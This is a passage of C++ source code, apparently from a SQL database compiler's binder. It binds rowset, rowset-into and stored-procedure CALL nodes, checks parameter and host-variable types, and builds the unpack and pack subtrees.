Now create a Tuple node to hang the children and input values of the // actual Rowset Node to it. Make sure to copy the RelExpr part of Rowset // to tuple. // Kludge up a dummy child for the index ItemExpr *inputs = ((indexExpr_) ? new (bindWA->wHeap()) ItemList(inputHostvars_, indexHostVar) : inputHostvars_); Tuple *tupleExpr = new (bindWA->wHeap()) Tuple(inputs); tupleExpr->setBlockStmt(isinBlockStmt()); copyTopNode(tupleExpr); // Construct the replacement tree for the Rowset operator. 
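  // The replacement tree is an UnPackRows node (bounded by maxRowsetSize and
  // driven by rowsetSizeExpr) on top of the Tuple of input host variables
  // built above; the Rowset's original selection predicate is then moved
  // onto the UnPackRows node so it is evaluated against the unpacked rows.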
RelExpr *newSubTree = (new (bindWA->wHeap()) UnPackRows(maxRowsetSize, unPackExpr, rowsetSizeExpr, NULL, tupleExpr, indexHostVar->getValueId())); newSubTree->setBlockStmt(isinBlockStmt()); // do not set this flag for derived rowsets. This flag is used in generator to determine // in onlj and TF TDB must set rownumber when encountering a execution time rowset error. if (arrayArea && (!(arrayArea->getHasDerivedRowsets())) && (arrayArea->hasInputRowsetsInSelectPredicate() != HostArraysWA::YES_)) { newSubTree->setRowsetIterator(TRUE); } // Move any predicate on the packed table to be on the result // of unpacking. newSubTree->addSelPredTree(removeSelPredTree()); // Remember the transform tree, just in case someone is trying to bind this // node again. transformRelexpr_ = newSubTree; // Bind the new generated subtree. return newSubTree->bindNode(bindWA); } // Rowset::bindNode() RelExpr * RowsetRowwise::bindNode(BindWA* bindWA) { // If this node has already been bound, we are done. if (nodeIsBound()) return this->transformRelexpr_; if (bindWA->getHostArraysArea()) { bindWA->getHostArraysArea()->done() = TRUE; } // // Bind the child nodes. // bindChildren(bindWA); if (bindWA->errStatus()) return this; // Transform current node into a new subtree which performs access to // RowSet based on the unpacking. // UNPACK // | // TUPLE // // We get the list of input host vars, which is stored in the root of the // parse tree HostArraysWA *arrayArea = bindWA->getHostArraysArea(); if ((arrayArea->rwrsMaxSize()->getOperatorType() != ITM_CONSTANT) || (((ConstValue *)arrayArea->rwrsMaxSize())->getType()->getTypeQualifier() != NA_NUMERIC_TYPE)) { // 30003 Rowset size must be an integer host variable or an // integer constant *CmpCommon::diags() << DgSqlCode(-30003); bindWA->setErrStatus(); return NULL; } // if partition number has been specified, then we don't unpack // rows. The whole buffer is shipped to the specified partition. if (arrayArea->partnNum()) return child(0)->castToRelExpr(); Lng32 maxRowsetSize = (Lng32)((ConstValue *)arrayArea->rwrsMaxSize())->getExactNumericValue() ; NAType * typ = new(bindWA->wHeap()) SQLInt(FALSE, FALSE); ItemExpr * rwrsInputSizeExpr = new(bindWA->wHeap()) Cast(arrayArea->inputSize(), typ); if (bindWA->errStatus()) return this; ItemExpr * rwrsMaxInputRowlenExpr = new(bindWA->wHeap()) Cast(arrayArea->rwrsMaxInputRowlen(), typ); if (bindWA->errStatus()) return this; ItemExpr * rwrsBufferAddrExpr = arrayArea->rwrsBuffer(); if (bindWA->errStatus()) return this; // Construct the replacement tree for the Rowset operator. RelExpr *newSubTree = (new (bindWA->wHeap()) UnPackRows(maxRowsetSize, rwrsInputSizeExpr, rwrsMaxInputRowlenExpr, rwrsBufferAddrExpr, child(0))); // Remember the transform tree, just in case someone is trying to bind this // node again. transformRelexpr_ = newSubTree; // Bind the new generated subtree. return newSubTree->bindNode(bindWA); } // RowsetRowwise::bindNode() // LCOV_EXCL_START - rfi RelExpr * RowsetFor::bindNode(BindWA* bindWA) { // Binding of this node should not happen. It should have been eliminated // by now by the pre-binding step. Its content is used to populate the // RowSet node with options. CMPASSERT(0); return NULL; } // LCOV_EXCL_STOP RelExpr * RowsetInto::bindNode(BindWA* bindWA) { // If this node has already been bound, we are done. if (nodeIsBound()) return this->transformRelexpr_; // // Bind the child nodes. 
// bindChildren(bindWA); if (bindWA->errStatus()) return this; NABoolean hasDifferentSizes = FALSE; Lng32 maxRowsetSize = 0; /* Maximum number of Rows in Rowset */ ULng32 numOutputHostvars = 0; ItemExpr *rowsetSizeExpr; ItemExpr *hostVarTree; // Do any extra checking at this moment. for (hostVarTree = outputHostvars_; hostVarTree; hostVarTree = hostVarTree->child(1)) { numOutputHostvars++; CMPASSERT(hostVarTree->getOperatorType() == ITM_ITEM_LIST); HostVar *hostVar = (HostVar *)hostVarTree->getChild(0); if (hostVar->getOperatorType() != ITM_HOSTVAR || hostVar->getType()->getTypeQualifier() != NA_ROWSET_TYPE) { // 30001 A rowset must be composed of host variable arrays *CmpCommon::diags() << DgSqlCode(-30001); bindWA->setErrStatus(); return NULL; } // Get the smallest dimension for rowset size SQLRowset* hostVarType = (SQLRowset *)hostVar->getType(); if (hostVarType->getNumElements() <= 0) { // 30004 The dimesion of the arrays composing the RowSet must be greater // than zero. A value of $0~Int0 was given *CmpCommon::diags() << DgSqlCode(-30004) << DgInt0((Int32)hostVarType->getNumElements()); bindWA->setErrStatus(); return NULL; } if (maxRowsetSize == 0) maxRowsetSize = hostVarType->getNumElements(); else if (hostVarType->getNumElements() != maxRowsetSize) { // 30005 Warning: the dimensions of the arrays composing the RowSet are // different. The smallest dimesnion is assumed. // This is just a warning // Give the warning only once if (hasDifferentSizes == FALSE) { hasDifferentSizes = TRUE; *CmpCommon::diags() << DgSqlCode(30005); } // Pick the smallest one if (hostVarType->getNumElements() < maxRowsetSize) maxRowsetSize = hostVarType->getNumElements(); } // Make sure that the element type null indicator and the corresponding // rowset array are both nullable or not nullable. That is, force it NAType* hostVarElemType = hostVarType->getElementType(); NABoolean hostVarElemNullInd = !(hostVar->getIndName().isNull()); hostVarElemType->setNullable(hostVarElemNullInd); } // If a rowset size expression was produced during parsing, it is used // to restrict the rowset size during execution. The expression must be // an numeric literal (known at compile time) or an integer host variable // (known at execution time). 
We do not allow other type of expression // since the rowset size must be know before the statement is executed to // avoid copying a lot when the host variable arrays are sent down the // execution queue if (sizeExpr_) { if (sizeExpr_->getOperatorType() == ITM_CONSTANT) { if (((ConstValue *)sizeExpr_)->getType()->getTypeQualifier() != NA_NUMERIC_TYPE) { // 30003 Rowset size must be an integer host variable or an // integer constant *CmpCommon::diags() << DgSqlCode(-30003); bindWA->setErrStatus(); return NULL; } if (((ConstValue *)sizeExpr_)->getExactNumericValue() > maxRowsetSize) { // 30002 The given RowSet size ($0~Int0) must be smaller or // equal to the smallest dimension ($1Int1) of the // arrays composing the rowset *CmpCommon::diags() << DgSqlCode(-30002) << DgInt0((Int32) ((ConstValue *)sizeExpr_) ->getExactNumericValue()) << DgInt1(maxRowsetSize); bindWA->setErrStatus(); return NULL; } } else if (!(sizeExpr_->getOperatorType() == ITM_HOSTVAR && ((HostVar *)sizeExpr_)->getType()->getFSDatatype() == REC_BIN32_SIGNED)) { // 30003 Rowset size must be an integer host variable or an // integer constant *CmpCommon::diags() << DgSqlCode(-30003); bindWA->setErrStatus(); return NULL; } rowsetSizeExpr = sizeExpr_; } else rowsetSizeExpr = new (bindWA->wHeap()) SystemLiteral(maxRowsetSize); if (getGroupAttr()->isEmbeddedUpdateOrDelete()){ // 30020 Embedded update/delete cannot be used with SELECT...INTO and rowset. *CmpCommon::diags() << DgSqlCode(-30020); bindWA->setErrStatus(); return NULL; } // Generate the RowsetArrayInto expressions which are used to append // an element value to the rowset array. // Get RETDesc from its only child one which must be RelRoot type. const RETDesc& childTable = *child(0)->getRETDesc(); ValueIdList childTableVidList; childTable.getValueIdList(childTableVidList); if (numOutputHostvars != childTableVidList.entries()) { // 4094 The number of output host vars ($0) must equal the number of cols *CmpCommon::diags() << DgSqlCode(-4094) #pragma nowarn(1506) // warning elimination << DgInt0(numOutputHostvars) << DgInt1(childTableVidList.entries()); #pragma warn(1506) // warning elimination bindWA->setErrStatus(); return NULL; } ItemExpr *packExpr = NULL; Lng32 i; for (hostVarTree = outputHostvars_, i = 0; hostVarTree; hostVarTree = hostVarTree->child(1), i++) { HostVar *hostVar = (HostVar *)hostVarTree->getChild(0); SQLRowset* hostVarType = (SQLRowset *)hostVar->getType(); NAType* hostVarElemType = hostVarType->getElementType(); // hostVarElemType->setNullable(TRUE); Lng32 hostVarElemSize = hostVarElemType->getTotalSize(); NABoolean hostVarElemNullInd = !(hostVar->getIndName().isNull()); ItemExpr* sourceExpr = childTableVidList[i].getItemExpr(); ValueId sourceId = childTableVidList[i]; const NAType& targetType = *hostVarElemType; sourceId.coerceType(targetType); const NAType& sourceType = sourceId.getType(); NABoolean relaxCharTypeMatchingRule = FALSE; // We make sure that the types that are coming from below this // node match properly with the types it has if (NOT targetType.isCompatible(sourceType)) { // JQ // Relaxing Characet Data Type mismatching rule. 
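      // (An ISO88591 source value assigned to a UNICODE rowset target is
      // tolerated here: instead of raising error 30007, a
      // Translate(ISO88591_TO_UNICODE) node is added to the source
      // expression further below.)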
if ( targetType.getTypeQualifier() == NA_CHARACTER_TYPE && sourceType.getTypeQualifier() == NA_CHARACTER_TYPE && ((const CharType&)targetType).getCharSet() == CharInfo::UNICODE && ((const CharType&)sourceType).getCharSet() == CharInfo::ISO88591 ) { relaxCharTypeMatchingRule = TRUE; } if ( !relaxCharTypeMatchingRule ) { // Incompatible assignment from type $0~String0 to type $1~String1 *CmpCommon::diags() << DgSqlCode(-30007) << DgString0(sourceType.getTypeSQLname(TRUE /*terse*/)) << DgString1(targetType.getTypeSQLname(TRUE /*terse*/)); bindWA->setErrStatus(); return FALSE; } } // Force all host variable to have the same number of elements which was // found previously hostVarType->setNumElements(maxRowsetSize); // The element size must be align hostVarElemSize = ALIGN(hostVarElemSize, hostVarElemType->getDataAlignment()); // Preserve the length that is coming from the node below this one if (hostVarElemType->getTypeQualifier() == NA_CHARACTER_TYPE && sourceType.getTypeQualifier() == NA_CHARACTER_TYPE) { Int32 sourceSize = ((CharType *) &sourceType)->getDataStorageSize(); Int32 targetSize = ((CharType *) hostVarElemType)->getDataStorageSize(); if (sourceSize > targetSize ) { // Adjust the layout size instead of changing the element size? ((CharType *) hostVarElemType)->setDataStorageSize(sourceSize); } } if ( relaxCharTypeMatchingRule == TRUE ) sourceExpr = new (bindWA->wHeap()) Translate(sourceExpr, Translate::ISO88591_TO_UNICODE); // If the type is external (for instance, decimal or varchar), we must first // convert to our internal equivalent type if (hostVarElemType->isExternalType()) { NAType *internalType = hostVarElemType->equivalentType(); sourceExpr = new (bindWA->wHeap()) Cast(sourceExpr, internalType); } sourceExpr = new (bindWA->wHeap()) Cast(sourceExpr, hostVarElemType); ItemExpr *packCol = new (bindWA->wHeap()) RowsetArrayInto(sourceExpr, rowsetSizeExpr, // Runtime size maxRowsetSize, // Cannot go over this size hostVarElemSize, // Element size in bytes hostVarElemNullInd, hostVarType ); // Construct a list of expressions to append the Data value to the // RowSet array. This list should be a NULL terminated list, // unfortunately, there are many parts in the SQL/MX code that // loops over the arity instead of checking for NULL terminated // list...the effect a segmentation violation. packExpr = (packExpr ? new (bindWA->wHeap()) ItemList(packExpr, packCol) : packCol); } // Construct the replacement tree for the RowsetInto operator. RelExpr *newSubTree = (new (bindWA->wHeap()) Pack(maxRowsetSize, child(0)->castToRelExpr(), packExpr)); newSubTree->setFirstNRows(getFirstNRows()); // If we have an ORDER BY when there is an INTO :array, then we // add the requirement that the tuples that this Pack node will // receive must be sorted ValueIdList *ptrReqOrder; ptrReqOrder = new (bindWA->wHeap()) ValueIdList(((RelRoot *) (RelExpr *) newSubTree->child(0))->reqdOrder()); ((Pack *) newSubTree)->setRequiredOrder(*ptrReqOrder); // Remember the transform tree, just in case someone is trying to bind this // node again. transformRelexpr_ = newSubTree; // Bind the new generated subtree. return newSubTree->bindNode(bindWA); } // RowsetInto::bindNode RelExpr * IsolatedScalarUDF::bindNode (BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // If we have a RoutineDesc, it means we got transformed from a // a UDFunction ItemExpr, and do NOT need to check all the metadata // params etc. 
if (getRoutineDesc() == NULL ) { // If we get here, we created a IsolatedScalarUDF some other way // than through the transformation of UDFunction. Either that or // we have someone walking over our memory... CMPASSERT(0); bindWA->setErrStatus(); return this; } else { markAsBound(); } return this; } // IsolatedScalarUDF::bindNode () /* * This method performs binder functions for the CALLSP node * It performs semantic checks on the called stored procedure * creates a Tuple child and allocates ValueIds for the parameters * It also provides support for the CLI layer processing for OUT * parameter processing. */ RelExpr *CallSP::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } if (bindWA->getHoldableType() == SQLCLIDEV_ANSI_HOLDABLE) { *CmpCommon::diags() << DgSqlCode(-4382); bindWA->setErrStatus(); bindWA->setBindingCall (FALSE); return this; } bindWA->setBindingCall (TRUE); bindWA->setCurrOrdinalPosition (1); bindWA->setCurrParamMode (COM_UNKNOWN_DIRECTION); bindWA->clearHVorDPinSPDups (); bindWA->setDupWarning (FALSE); bindWA->setMaxResultSets(0); // try PUBLIC SCHEMA only when no schema was specified // and CQD PUBLIC_DEFAULT_SCHEMA is specified NAString pSchema = ActiveSchemaDB()->getDefaults().getValue(PUBLIC_SCHEMA_NAME); ComSchemaName pubSchema(pSchema); NAString pubSchemaIntName = ""; if ( (getRoutineName().getSchemaName().isNull()) && (!pubSchema.getSchemaNamePart().isEmpty()) ) { pubSchemaIntName = pubSchema.getSchemaNamePart().getInternalName(); } // Invoke GetNARoutine () to retrieve the corresponding NARoutine from // NARoutineDB_ QualifiedName name = getRoutineName(); const SchemaName &defaultSchema = bindWA->getSchemaDB ()->getDefaultSchema(); name.applyDefaults(defaultSchema); setRoutineName(name); bindWA->setCurrSPName(&name); // in open source, only the SEABASE catalog is allowed. // Return an error if some other catalog is being used. if ((NOT name.isSeabase()) && (NOT name.isHive())) { *CmpCommon::diags() << DgSqlCode(-1002) << DgCatalogName(name.getCatalogName()) << DgString0(""); bindWA->setErrStatus(); return NULL; } CmpSeabaseDDL cmpSBD((NAHeap*)bindWA->wHeap()); desc_struct *catRoutine = cmpSBD.getSeabaseRoutineDesc( name.getCatalogName(), name.getSchemaName(), name.getObjectName()); // try public schema if ( !catRoutine && !pubSchemaIntName.isNull() ) { getRoutineName().setSchemaName(pubSchemaIntName); if ( !pubSchema.getCatalogNamePart().isEmpty() ) { getRoutineName().setCatalogName(pubSchema.getCatalogNamePart().getInternalName()); } // in open source, only the SEABASE catalog is allowed. // Return an error if some other catalog is being used. if ((NOT getRoutineName().isSeabase()) && (NOT getRoutineName().isHive())) { *CmpCommon::diags() << DgSqlCode(-1002) << DgCatalogName(getRoutineName().getCatalogName()) << DgString0(""); bindWA->setErrStatus(); return NULL; } bindWA->resetErrStatus(); catRoutine = cmpSBD.getSeabaseRoutineDesc( getRoutineName().getCatalogName(), getRoutineName().getSchemaName(), getRoutineName().getObjectName()); if ( !bindWA->errStatus() && catRoutine ) { // if found in public schema, do not show previous error CmpCommon::diags()->clear(); } } if (bindWA->violateAccessDefaultSchemaOnly(getRoutineName())) return NULL; if ( NULL == catRoutine ) { // Diagnostic error is set by the readRoutineDef, we just need to // make sure the rest of the compiler knows that an error occurred. 
bindWA->setBindingCall (FALSE); bindWA->setErrStatus (); return this; } // Create a new NARoutine object Int32 error = FALSE; NARoutine *routine = new (bindWA->wHeap()) NARoutine ( getRoutineName(), catRoutine, bindWA, error ); if ( bindWA->errStatus () ) { // Error bindWA->setBindingCall (FALSE); bindWA->setErrStatus (); return this; } NABoolean createRETDesc=TRUE; RoutineDesc *rDesc = new (bindWA->wHeap()) RoutineDesc(bindWA, routine); if (rDesc == NULL || bindWA->errStatus ()) { // Error bindWA->setBindingCall (FALSE); bindWA->setErrStatus (); return this; } if (rDesc->populateRoutineDesc(bindWA, createRETDesc) == FALSE ) { bindWA->setBindingCall (FALSE); bindWA->setErrStatus (); return this; } setRoutineDesc(rDesc); // // Semantic checks // // if in trigger and during DDL make sure to Fix up the name // location list so that the name is fully qualified when stored // in the TEXT metadata table if ( bindWA->inDDL() && bindWA->isInTrigger () ) { ParNameLocList *pNameLocList = bindWA->getNameLocListPtr(); if (pNameLocList) { ParNameLoc * pNameLoc = pNameLocList->getNameLocPtr(getRoutineName().getNamePosition()); CMPASSERT(pNameLoc); pNameLoc->setExpandedName(getRoutineName().getQualifiedNameAsAnsiString()); } } // Cannot support result sets or out params when // SP is invoked within a trigger if ( bindWA->isInTrigger () && getNARoutine()->hasOutParams ()) { *CmpCommon::diags() << DgSqlCode(-UDR_BINDER_OUTPARAM_IN_TRIGGER) << DgTableName (getRoutineName().getQualifiedNameAsString()); bindWA->setErrStatus (); bindWA->setBindingCall (FALSE); return this; } if ( bindWA->isInTrigger () && getNARoutine()->hasResultSets ()) { *CmpCommon::diags() << DgSqlCode(-UDR_BINDER_RESULTSETS_IN_TRIGGER) << DgTableName (getRoutineName().getQualifiedNameAsString()); bindWA->setErrStatus (); bindWA->setBindingCall (FALSE); return this; } const NAColumnArray &params = getNARoutine()->getParams (); CollIndex i = 0; CollIndex numParams = getNARoutine()->getParamCount (); CollIndex numSuppliedParams = countSuppliedParams (getRWProcAllParamsTree()); if (numSuppliedParams != numParams) { *CmpCommon::diags() << DgSqlCode(-UDR_BINDER_INCORRECT_PARAM_COUNT) << DgTableName(getRoutineName().getQualifiedNameAsString()) << DgInt0((Lng32) numParams) << DgInt1((Lng32) numSuppliedParams); bindWA->setErrStatus (); bindWA->setBindingCall (FALSE); return this; } short numResultSets = (short) getNARoutine()->getMaxResults(); bindWA->setMaxResultSets(numResultSets); // On to the binding // Invoke populateAndBindItemExpr, set up needed data structures // Set up a RETDesc if we don't already have one. RETDesc *resultTable = getRETDesc(); if (resultTable == NULL) { resultTable = new (bindWA->wHeap()) RETDesc(bindWA); setRETDesc(resultTable); } populateAndBindItemExpr ( getRWProcAllParamsTree(), bindWA ); if ( bindWA->errStatus ()) { bindWA->setBindingCall (FALSE); return this; } // Clear the Tree since we now have gotten vids for all the parameters. setProcAllParamsTree(NULL); // Now fix the param index value of the dynamic params or host vars LIST (ItemExpr *) &bWA_HVorDPs = bindWA->getSpHVDPs(); CollIndex numHVorDPs = bWA_HVorDPs.entries(); ARRAY(ItemExpr *) local_HVorDPs(numHVorDPs); CollIndex idx, idx1, idx2; // Sort the ItemExpr in the order they appeared in the stmt for (idx = 0; idx < numHVorDPs; idx++) { // Copy ItemExpr ptrs to a sorted Array. local_HVorDPs.insertAt(bWA_HVorDPs[idx]->getHVorDPIndex() - 1, bWA_HVorDPs[idx]); } // The following code goes through the list of Exprs and // sets index values. The rules are: // 1. 
When a DP or HV is repeated, all of them get the same // index value which is equal to the index of the first occurrence // 2. Two DPs or HVs are same if their names and the modes are same. Int32 currParamIndex = 1; for (idx1 = 0; idx1 < numHVorDPs; idx1++) { ItemExpr *src = local_HVorDPs[idx1]; const NAString &name1 = (src->getOperatorType() == ITM_HOSTVAR) ? ((HostVar *)src)->getName() : ((DynamicParam *)src)->getName(); ComColumnDirection mode1 = src->getParamMode(); NABoolean encounteredElement = FALSE; for (idx2 = idx1; idx2 < numHVorDPs; idx2++) { ItemExpr *dest = local_HVorDPs[idx2]; if (!encounteredElement && dest->getHVorDPIndex() >= currParamIndex) { // The parameter is encountered the first time encounteredElement = TRUE; dest->setPMOrdPosAndIndex(dest->getParamMode(), dest->getOrdinalPosition(), currParamIndex); continue; } // The parameter is already corrected if (dest->getHVorDPIndex() < currParamIndex) continue; const NAString &name2 = (dest->getOperatorType() == ITM_HOSTVAR) ? ((HostVar *)dest)->getName() : ((DynamicParam *)dest)->getName(); ComColumnDirection mode2 = dest->getParamMode(); if (name2.compareTo("") == 0) continue; if (name1.compareTo(name2) == 0 && mode1 == mode2) { dest->setPMOrdPosAndIndex(dest->getParamMode(), dest->getOrdinalPosition(), currParamIndex); } } if (encounteredElement) currParamIndex++; } // Restore the bindWA's HVorDP list since it might be needed // while binding the root node in case of HVs. bindWA->clearHVorDPinSPDups(); for (idx = 0; idx < numHVorDPs; idx++) bindWA->addHVorDPToSPDups(local_HVorDPs[idx]); // Create a tuple child for any subqueries or UDF inputs // The hasSubquery() / hasUDF() flag gets set in setInOrOutParam if any of our // passed in parameters is a subquery. if ((getProcInputParamsVids().entries() != 0) && (hasSubquery() || hasUDF())) { Tuple *inTuple = new (bindWA->wHeap()) Tuple(getProcInputParamsVids().rebuildExprTree(ITM_ITEM_LIST), bindWA->wHeap()); if ( inTuple ) { // Now set and bind the Tuple child setChild (0, inTuple); // Bind this Tuple child inTuple->bindNode (bindWA); if ( bindWA->errStatus ()) { bindWA->setBindingCall (FALSE); return this; } // Get each IN entry from the Tuple and put it in //the super's list // Need to clear the list to avoid duplicates getProcInputParamsVids().clear(); // Now reinitialize the inputs based on the Tuple processing. inTuple->getRETDesc ()->getValueIdList (getProcInputParamsVids()); } // if inTuple else { // Out of memory ... bindWA->setBindingCall (FALSE); bindWA->setErrStatus(); return this; } } // if getProcInputParamVids().entries() else { // If we dont have a subquery parameter, we dont need to go thru // Optimization time rules and transformations, hence mark this // as a physical node. isPhysical_ = TRUE; } // // Not sure whether we need to set the currently scoped RETDesc // before binding the base class. Tuple::bindNode() does not do it // so we won't either (for now) // //bindWA->getCurrentScope()->setRETDesc(getRETDesc()); // add the routine to the UdrStoiList. 
The UdrStoi list is used // to check valid privileges LIST(OptUdrOpenInfo *) udrList = bindWA->getUdrStoiList (); ULng32 numUdrs = udrList.entries(); NABoolean udrReferenced = FALSE; // See if UDR already exists for (ULng32 stoiIndex = 0; stoiIndex < numUdrs; stoiIndex++) { if ( 0 == udrList[stoiIndex]->getUdrName().compareTo( getRoutineName().getQualifiedNameAsAnsiString() ) ) { udrReferenced = TRUE; break; } } // UDR has not been defined, go ahead an add one if ( FALSE == udrReferenced ) { SqlTableOpenInfo *udrStoi = new (bindWA->wHeap ())SqlTableOpenInfo (); udrStoi->setAnsiName ( convertNAString( getRoutineName().getQualifiedNameAsAnsiString(), bindWA->wHeap ()) ); OptUdrOpenInfo *udrOpenInfo = new (bindWA->wHeap ()) OptUdrOpenInfo( udrStoi , getRoutineName().getQualifiedNameAsAnsiString() , (NARoutine *)getNARoutine() ); bindWA->getUdrStoiList().insert(udrOpenInfo); } // // Bind the base class // RelExpr *boundExpr = bindSelf(bindWA); if (bindWA->errStatus()) { bindWA->setBindingCall (FALSE); return boundExpr; } // Our characteristic inputs get set for us, we don't need to do it // ourselves, however, we need to set our characteristic outputs getGroupAttr()->addCharacteristicOutputs(getProcOutputParamsVids()); if (getNARoutine()->isProcedure()) bindWA->setHasCallStmts(TRUE); bindWA->setBindingCall (FALSE); return boundExpr; } // CallSP::bindNode() // This is the main entry point to walking the ItemExpr tree built by the // parser, separating the IN and OUT parameters, setting appropriate // characteristics of the IN/OUT parameters and binding them // Currently only CallSP uses this code. If this routine needs to be shared void IsolatedNonTableUDR::populateAndBindItemExpr ( ItemExpr *param, BindWA *bindWA ) { // This method is called recursively CollIndex numParams = getEffectiveNARoutine()->getParamCount (); CollIndex ordinalPosition = bindWA->getCurrOrdinalPosition (); // No parameters, or we are done with the leaf node if ( NULL == param ) { return; } ComColumnDirection mode = getEffectiveNARoutine()->getParams()[ordinalPosition-1]->getColumnMode (); // This is the structure of the ItemExpr tree // For 1 param // ItemExpr // // 2 params // ItemList // / \ // Param1 Param2 // // > 2 params // ItemList // / \ // Param1 ItemList // / \ // Param2 ItemList // ... ... // ... ... // / / \ // Param (N-2) / \ // / \ // Param(N-1) Param(N) if ( ITM_ITEM_LIST == param->getOperatorType ()) { // Use left child CMPASSERT ((ItemExpr *) NULL != (*param).child (0)); populateAndBindItemExpr ( (*param).child(0), bindWA ); if ( bindWA->errStatus ()) return; // Now for the right child CMPASSERT ((ItemExpr *) NULL != (*param).child (1)); populateAndBindItemExpr ( (*param).child(1), bindWA ); return; } // if ITM_ITEM_LIST == param->getOperatorType () // For all leaf nodes we must come here (see the recursive call to // populateAndBindItemExp above) // Set the bindWA's current ordinal position and parameter mode // Let HV and DynamicParam's bindNode take care of the // settings. To ensure this, do a bindNode here bindWA->setCurrParamMode (mode); param->bindNode (bindWA); if (bindWA->errStatus ()) return; // Add the IN or OUT params to their respective lists // and also create and bind a new ItemExpr for INOUT and OUT // params. // Also bump up the ordinalPosition count since we are done with this // parameter. 
setInOrOutParam (param,/* ordinalPosition,*/ mode, bindWA); if ( bindWA->errStatus ()) return; bindWA->setCurrOrdinalPosition (bindWA->getCurrOrdinalPosition () + 1); } // PopulateAndBindItemExpr // LCOV_EXCL_START - rfi void IsolatedNonTableUDR::setInOrOutParam (ItemExpr *expr, ComColumnDirection paramMode, BindWA *bindWA) { // Should not get here.. CMPASSERT(FALSE); } // LCOV_EXCL_STOP // This method separates the IN and OUT parameters Each IN/INOUT param // is cast to the formal type (from NARoutine). This Cast'ed item expr // is added to an ItemList tree to be passed to the Tuple () // constructor. For each OUT/INOUT, we create a NATypeToItem // ItemExpr, bind it and add it to procOutParams_. // // This method is called once for each CALL statement argument. If an // input argument to a CALL is an expression tree such as "? + ?" or // "abs(:x)" then this method is called once for the entire tree. // // Side Effects: OUT: hasSubquery_ // neededValueIds_ // procAllParamsVids_ // procInputParamsVids_ // procOutputParamsVids_ void CallSP::setInOrOutParam ( ItemExpr *expr, ComColumnDirection paramMode, BindWA *bindWA) { // Depending on whether this is an IN or OUT parameter, we need to // take different actions. // For an IN (and INOUT) param, do the following // Cast the parameter to its formal type and add it to the list of // IN params. This will be used later to create a Tuple child and // be bound by the Tuple itself CollIndex ordinalPosition = bindWA->getCurrOrdinalPosition (); const NAColumnArray &formalParams = getNARoutine()->getParams(); NAColumn &naColumn = *(formalParams[ordinalPosition-1]); const NAType &paramType = *(naColumn.getType()); // Don't really want to bind this, but how else can we // get the ItemExpr's type ItemExpr *boundExpr = expr->bindNode (bindWA); if ( bindWA->errStatus ()) { return; } //10-061031-0188-Begin //Need to infer charset for string literals part of CALLSP //parameters ValueId inputTypeId = boundExpr->getValueId(); if(inputTypeId.getType().getTypeQualifier() == NA_CHARACTER_TYPE) { const CharType* stringLiteral = (CharType*)&(inputTypeId.getType()); if(CmpCommon::wantCharSetInference()) { const CharType* desiredType = CharType::findPushDownCharType(((CharType&)paramType).getCharSet(), stringLiteral, 0); if ( desiredType ) inputTypeId.coerceType((NAType&)*desiredType, NA_CHARACTER_TYPE); } } NABoolean throwInTranslateNode = FALSE; CharInfo::CharSet paramCS = CharInfo::UnknownCharSet; CharInfo::CharSet inputCS = CharInfo::UnknownCharSet; const NABoolean isJdbc = (CmpCommon::getDefault(JDBC_PROCESS) == DF_ON ? TRUE : FALSE); const NABoolean isOdbc = (CmpCommon::getDefault(ODBC_PROCESS) == DF_ON ? TRUE : FALSE); const NAType &inputType = inputTypeId.getType(); //10-061031-0188-End if ( COM_INPUT_COLUMN == paramMode || COM_INOUT_COLUMN == paramMode ) { // If this input argument to the CALL is a single dynamic param // then we want to record the formal parameter name. It will later // be written into the query plan by the code generator and // eventually if this CALL statement is DESCRIBEd, the formal // param name gets returned in the SQLDESC_NAME descriptor entry. 
if (expr->getOperatorType() == ITM_DYN_PARAM) { DynamicParam *dp = (DynamicParam *) expr; dp->setUdrFormalParamName(naColumn.getColName()); } // Check to see if we have a Subquery as an input if ( !hasSubquery() ) hasSubquery() = expr->containsSubquery (); // Check to see if we have a UDF as an input if ( !hasUDF() ) hasUDF() = (expr->containsUDF () != NULL); // Do type checking, // If it is not a compatible type report an error if (!( NA_UNKNOWN_TYPE == inputType.getTypeQualifier () || paramType.isCompatible(inputType) || expr->getOperatorType () == ITM_DYN_PARAM ) ) { if ( inputType.getTypeQualifier() == NA_CHARACTER_TYPE ) { paramCS = ((CharType&)paramType).getCharSet(); inputCS = ((CharType&)inputType).getCharSet(); NABoolean CS_unknown = (paramCS == CharInfo::UnknownCharSet) || (inputCS == CharInfo::UnknownCharSet) ; if ( paramType.NAType::isCompatible(inputType) && paramCS != inputCS && CS_unknown == FALSE && CmpCommon::getDefault(ALLOW_IMPLICIT_CHAR_CASTING) == DF_ON ) throwInTranslateNode = TRUE; } if ( throwInTranslateNode == FALSE ) { // Error, data types dont match #pragma nowarn(1506) // warning elimination *CmpCommon::diags() << DgSqlCode(-UDR_BINDER_PARAM_TYPE_MISMATCH) << DgInt0 (ordinalPosition) << DgTableName(getRoutineName().getQualifiedNameAsString()) << DgString0 (inputType.getTypeSQLname (TRUE)) << DgString1 (paramType.getTypeSQLname (TRUE)); #pragma warn(1506) // warning elimination bindWA->setErrStatus (); return; } } // if NOT isCompatible // Create a Cast node if the types are not identical if (! (inputType == paramType)) { // First create a Translate node if the character sets are not identical if ( throwInTranslateNode ) { Int32 tran_type = find_translate_type( inputCS, paramCS ); ItemExpr * newTranslateChild = new (bindWA->wHeap()) Translate(boundExpr, tran_type ); boundExpr = newTranslateChild->bindNode(bindWA); if (bindWA->errStatus()) return; // NOTE: Leave "expr" at it's old value as code below needs to check // that original ItemExpr rather than the new Translate node. 
